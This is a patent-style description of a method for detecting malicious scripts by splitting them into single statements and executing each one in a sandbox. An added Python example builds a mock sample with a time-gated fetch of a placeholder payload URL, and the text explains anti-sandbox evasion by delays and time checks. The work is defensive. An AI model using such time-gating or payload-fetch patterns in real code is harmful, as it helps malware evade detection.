Disclosure of Invention
The present invention is directed to solving, at least to some extent, one of the technical problems in the related art.
To this end, a first object of the present invention is to propose a method for detecting malicious scripts.
A second object of the present invention is to provide a malicious script detection apparatus.
A third object of the invention is to propose a computer device.
A fourth object of the invention is to propose a non-transitory computer-readable storage medium.
A fifth object of the invention is to propose a computer program product.
In order to achieve the above object, an embodiment of a first aspect of the present invention provides a method for detecting a malicious script, including the following steps: acquiring a script to be tested, and acquiring a plurality of logic blocks of the script to be tested through lexical grammar analysis; dynamically processing each logic block of the plurality of logic blocks, and acquiring a processing result of each logic block; and acquiring a malicious detection result of the script to be detected according to the processing result of each logic block.
The detection method of the malicious script in the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, thereby effectively improving the accuracy and reliability of detection, further enabling a user to avoid being attacked by the malicious script, and improving the use experience of the user.
In addition, the method for detecting a malicious script according to the above embodiment of the present invention may further have the following additional technical features:
Further, in an embodiment of the present invention, obtaining the plurality of logic blocks of the script to be tested through lexical grammar analysis further includes: taking each independently executed minimum statement unit in the script to be tested as a logic block through lexical grammar analysis, so as to obtain the plurality of logic blocks by division.
Further, in an embodiment of the present invention, the method further includes: saving the processing result of each logic block.
Further, in an embodiment of the present invention, dynamically processing each logic block of the plurality of logic blocks includes: calling a dynamic processing interface to pass in the plurality of logic blocks sequentially for dynamic processing.
In order to achieve the above object, a second embodiment of the present invention provides a malicious script detection apparatus, including: a first acquisition module, configured to acquire a script to be tested and to acquire a plurality of logic blocks of the script to be tested through lexical grammar analysis; a processing module, configured to dynamically process each logic block of the plurality of logic blocks and to acquire the processing result of each logic block; and a second acquisition module, configured to acquire the malicious detection result of the script to be detected according to the processing result of each logic block.
The detection device for the malicious script provided by the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, so that the accuracy and reliability of detection are effectively improved, a user can be prevented from being attacked by the malicious script, and the use experience of the user is improved.
In addition, the detection apparatus for malicious scripts according to the above embodiment of the present invention may further have the following additional technical features:
Further, in an embodiment of the present invention, the first acquisition module is further configured to take each independently executed minimum statement unit in the script to be tested as a logic block through lexical grammar analysis, so as to obtain the plurality of logic blocks by division; the processing module is further configured to call a dynamic processing interface so as to pass in the plurality of logic blocks sequentially for dynamic processing.
Further, in an embodiment of the present invention, the apparatus further includes: a storage module, configured to store the processing result of each logic block.
In order to achieve the above object, a third embodiment of the present invention provides a computer device, which includes a memory, a processor, and a computer program stored in the memory and executable on the processor, and when the processor executes the computer program, the processor implements the method for dynamically detecting malicious code according to the above embodiment.
To achieve the above object, a fourth aspect of the present invention provides a non-transitory computer-readable storage medium, on which a computer program is stored, and when the computer program is executed by a processor, the method for dynamically detecting malicious code according to the above embodiment is implemented.
To achieve the above object, a fifth aspect of the present invention provides a computer program product, wherein when the instructions in the computer program product are executed by a processor, the method for dynamically detecting malicious code according to the above embodiments is performed.
Additional aspects and advantages of the invention will be set forth in part in the description which follows and, in part, will be obvious from the description, or may be learned by practice of the invention.
Detailed Description
Reference will now be made in detail to embodiments of the present invention, examples of which are illustrated in the accompanying drawings, wherein like or similar reference numerals refer to the same or similar elements or elements having the same or similar function throughout. The embodiments described below with reference to the drawings are exemplary, are intended to explain the invention, and are not to be construed as limiting the invention.
The following describes a method and an apparatus for detecting a malicious script according to an embodiment of the present invention with reference to the drawings, and first, a method for detecting a malicious script according to an embodiment of the present invention will be described with reference to the drawings.
FIG. 1 is a flow chart of a method of detecting malicious scripts according to one embodiment of the present invention.
As shown in fig. 1, the method for detecting malicious scripts includes the following steps:
In step S101, a script to be tested is obtained, and a plurality of logic blocks of the script to be tested are obtained through lexical grammar analysis.
It can be understood that, as shown in fig. 2, in the embodiment of the present invention, a script to be detected is first obtained, and static logic blocking preprocessing is performed on it by lexical grammar analysis or other means.
It should be noted that, in the embodiment of the present invention, static logic blocking preprocessing is performed on the script to be detected, and the purpose of blocking is to eliminate the influence of all logic judgments and function calls in the script on the subsequent dynamic processing result. That is to say, the static logic blocking preprocessing removes the influence of all logic judgments and function calls in the script on the subsequent dynamic processing result, thereby improving the acquisition capability and accuracy of the dynamic behavior.
Further, in an embodiment of the present invention, obtaining a plurality of logic blocks of the script to be tested through lexical grammar analysis further includes: taking each independently executed minimum statement unit in the script to be tested as a logic block through lexical grammar analysis, so as to obtain the plurality of logic blocks by division.
It is understood that the blocking method is to take, according to the lexical grammar analysis, each smallest statement unit in the script that can be executed on its own as a logic block (e.g., splitting the statements inside an if/else so that they are executed unconditionally, etc.).
In step S102, dynamic processing is performed on each of the plurality of logical blocks, and a processing result of each logical block is acquired.
It can be understood that, in the embodiment of the present invention, the plurality of logical partitions are sent to the dynamic detection module, and the dynamic detection module performs dynamic processing on the plurality of received logical partitions.
Further, in an embodiment of the present invention, dynamically processing each of the plurality of logic blocks includes: calling a dynamic processing interface to pass in the plurality of logic blocks sequentially for dynamic processing.
It can be understood that, in the embodiment of the present invention, the dynamic processing interface is invoked to pass the divided logic blocks sequentially into the dynamic processing, so as to obtain the processing result of each logic block. Thus, when an error occurs in the dynamic processing of one block, the dynamic processing of the subsequent module is not affected, and as much code as possible is executed, thereby improving the acquisition capability of the dynamic behavior of the malicious code.
Further, in an embodiment of the present invention, the method of an embodiment of the present invention further includes: the processing result of each logical block is saved.
It is understood that, as shown in fig. 2, the embodiment of the present invention may store the processing result after each block is dynamically processed.
In step S103, a malicious detection result of the script to be detected is obtained according to the processing result of each logic block.
For example, most malicious scripts to be detected have undergone measures such as compression, encryption and obfuscation. If detection is performed in a traditional dynamic detection mode, then when the execution of the malicious code is bypassed by anti-sandbox means such as time delays and current-time checks, the malicious behavior of the malicious script cannot actually be detected. Therefore, the embodiment of the invention adds the static logic blocking preprocessing function before dynamically processing the script to be detected, so that each statement which can be independently executed is executed during dynamic processing, thereby effectively improving the acquisition capability and the accuracy of the dynamic behavior of the malicious code.
Specifically, in one embodiment of the present invention, as shown in fig. 2, the method of the embodiment of the present invention includes the following steps:
Step S201, start.
Step S202, detecting the script.
That is, the script to be tested is acquired, and the process proceeds to step S203.
Step S203, static logic blocking.
Specifically, static logic partitioning preprocessing is performed on the script to be detected through lexical and grammatical analysis and the like, so that influence of all logic judgment and function calling in the script on a next dynamic processing result is eliminated.
In the embodiment of the invention, the static logic block preprocessing function is added, so that each statement which can be executed independently can be executed during dynamic processing, and the acquisition capability and the accuracy of the dynamic behavior of the malicious code can be effectively improved.
Step S204, dynamic processing.
After the static logic blocks are preprocessed, the divided logic blocks are sequentially transmitted to be dynamically processed, so that the processing result of each logic block is obtained, the dynamic processing of a subsequent module is prevented from being influenced when one block has an error in the dynamic processing process, more codes are effectively executed, and the acquisition capacity of the dynamic behavior of malicious codes is improved.
Step S205, saving the result of each block's processing.
Step S206, obtaining a malicious detection result according to each block's processing result.
In short, if detection is performed according to the dynamic detection method of the related art, and the execution of the malicious code is bypassed by anti-sandbox methods such as delaying and judging the current time, the malicious behavior of the malicious script cannot actually be detected. In the embodiment of the present invention, however, a static logic blocking preprocessing function is added before dynamically processing the script to be detected, so that each statement that can be executed independently is executed during dynamic processing, and the dynamic processing interface is invoked to pass the divided logic blocks sequentially into the dynamic processing, thereby obtaining the processing result of each logic block.
Step S207, end.
The embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, realize effective detection of the malicious script, and thereby avoid attacks by the malicious script.
According to the detection method of the malicious script provided by the embodiment of the invention, the logic block preprocessing function is added on the static detection method and the dynamic processing is combined, so that the malicious code can be executed unconditionally in the dynamic detection, the real malicious behavior of the malicious script can be rapidly and accurately detected, and the effective detection of the malicious script is realized, thereby effectively improving the acquisition capability of the dynamic behavior of the malicious code, effectively improving the accuracy and reliability of the detection, further preventing a user from being attacked by the malicious script, and improving the use experience of the user.
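The flow of steps S202 to S206, as an added example that is not code from the patent: a constructed sample is run once as a whole (the related-art dynamic run) and once after static logic blocking, to show what each run observes. The choice of Python as the script language, the stubbed `fetch`/`write_file` functions that only record calls, the `exec()`-based stand-in for the dynamic processing interface, and the verdict rule are all assumptions made for illustration.

```python
import ast

# Constructed sample standing in for a script to be tested. The fetch() call is
# gated behind a current-time check, and a later statement raises an error.
SAMPLE = '''
import time
url = "http://example.invalid/payload"
if time.time() > 4102444800:      # only true after the year 2100
    fetch(url)
undefined_helper()
write_file("out.tmp", url)
'''

COMPOUND = (ast.If, ast.For, ast.While, ast.With, ast.Try)

def split_blocks(source):
    """Static logic blocking: every minimal statement becomes its own block and
    the conditions or loops that wrapped it are discarded."""
    blocks = []
    def walk(stmts):
        for node in stmts:
            if isinstance(node, COMPOUND):
                for field in ("body", "orelse", "finalbody"):
                    walk(getattr(node, field, []))
                for handler in getattr(node, "handlers", []):
                    walk(handler.body)
            elif not isinstance(node, ast.Pass):
                blocks.append(ast.unparse(node))
    walk(ast.parse(source).body)
    return blocks

def run(chunks):
    """Stand-in dynamic processing interface (assumed): exec() with stubbed
    fetch/write_file that only record the call. Chunks share one namespace; an
    error in one chunk is stored and the remaining chunks still run."""
    log = []
    env = {name: (lambda *a, _n=name: log.append((_n, a)))
           for name in ("fetch", "write_file")}
    results = []
    for code in chunks:
        seen, error = len(log), None
        try:
            exec(code, env)
        except Exception as exc:
            error = type(exc).__name__
        results.append({"code": code, "behaviors": log[seen:], "error": error})
    return results   # the saved per-block processing results

def verdict(results, watched=("fetch", "write_file")):
    """Assumed rule: malicious if any block performed a watched behavior."""
    hits = [b for r in results for b in r["behaviors"] if b[0] in watched]
    return {"malicious": bool(hits), "hits": hits}

whole = run([SAMPLE])                 # conventional run: script as one unit
blocked = run(split_blocks(SAMPLE))   # blocked run: one statement at a time
print(verdict(whole))
print(verdict(blocked))
```

Run as one unit, the sample skips the time-gated call and stops at the first error, so nothing is recorded; run block by block, both stubbed calls are recorded and the error is confined to its own block.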
Next, a detection apparatus of a malicious script proposed according to an embodiment of the present invention is described with reference to the drawings.
Fig. 3 is a schematic structural diagram of a malicious script detection apparatus according to an embodiment of the present invention.
As shown in fig. 3, the malicious script detection apparatus 10 includes: a first acquisition module 100, a processing module 200 and a second acquisition module 300.
The first obtaining module 100 is configured to obtain a script to be tested, and obtain a plurality of logic blocks of the script to be tested through lexical syntax analysis. The processing module 200 is configured to perform dynamic processing on each of the plurality of logical partitions, and obtain a processing result of each logical partition. The second obtaining module 300 is configured to obtain a malicious detection result of the script to be detected according to the processing result of each logic block. The device 10 of the embodiment of the invention can enable the malicious code to be executed unconditionally in dynamic detection, quickly and accurately detect the real malicious behavior of the malicious script, and realize effective detection of the malicious script, thereby effectively improving the accuracy and reliability of detection, further enabling a user to avoid being attacked by the malicious script, and improving the use experience of the user.
Further, in an embodiment of the present invention, the first obtaining module 100 is further configured to use each separately executed minimum statement unit in the script to be tested as a logic partition through lexical grammar analysis, so as to obtain a plurality of logic partitions through segmentation; the processing module is further used for calling the dynamic processing interface so as to sequentially transmit the plurality of logic blocks to be dynamically processed.
Further, in one embodiment of the present invention, the apparatus 10 of the embodiment of the present invention further comprises a storage module. The storage module is used for storing the processing result of each logic block.
It should be noted that the explanation of the foregoing embodiment of the method for detecting a malicious script is also applicable to the apparatus for detecting a malicious script of this embodiment, and details are not described here again.
According to the detection device for the malicious script, which is provided by the embodiment of the invention, the logic block preprocessing function is added on the static detection method and the dynamic processing is combined, so that the malicious code can be executed unconditionally in the dynamic detection, the true malicious behavior of the malicious script can be rapidly and accurately detected, and the effective detection of the malicious script is realized, thereby effectively improving the acquisition capability of the dynamic behavior of the malicious code, effectively improving the accuracy and reliability of the detection, further preventing a user from being attacked by the malicious script, and improving the use experience of the user.
In addition, an embodiment of the present invention further provides a computer device, which includes a memory, a processor, and a computer program that is stored in the memory and can be run on the processor, and when the processor executes the program, the method for dynamically detecting malicious codes according to the above embodiment is implemented.
Furthermore, an embodiment of the present invention further provides a non-transitory computer-readable storage medium, on which a computer program is stored, where the computer program, when executed by a processor, implements the method for dynamically detecting malicious code according to the above embodiment.
Furthermore, the first embodiment of the present invention further provides a computer program product, wherein when instructions in the computer program product are executed by a processor, the method for dynamically detecting malicious code according to the above embodiments is performed.
Furthermore, the terms "first" and "second" are used for descriptive purposes only and are not to be construed as indicating or implying relative importance or implicitly indicating the number of technical features indicated. Thus, a feature defined as "first" or "second" may explicitly or implicitly include at least one such feature. In the description of the present invention, "a plurality" means at least two, e.g., two, three, etc., unless specifically limited otherwise.
In the description herein, references to the description of the term "one embodiment," "some embodiments," "an example," "a specific example," or "some examples," etc., mean that a particular feature, structure, material, or characteristic described in connection with the embodiment or example is included in at least one embodiment or example of the invention. In this specification, the schematic representations of the terms used above are not necessarily intended to refer to the same embodiment or example. Furthermore, the particular features, structures, materials, or characteristics described may be combined in any suitable manner in any one or more embodiments or examples. Furthermore, various embodiments or examples and features of different embodiments or examples described in this specification can be combined by one skilled in the art without contradiction.
Although embodiments of the present invention have been shown and described above, it is understood that the above embodiments are exemplary and should not be construed as limiting the present invention, and that variations, modifications, substitutions and alterations can be made to the above embodiments by those of ordinary skill in the art within the scope of the present invention.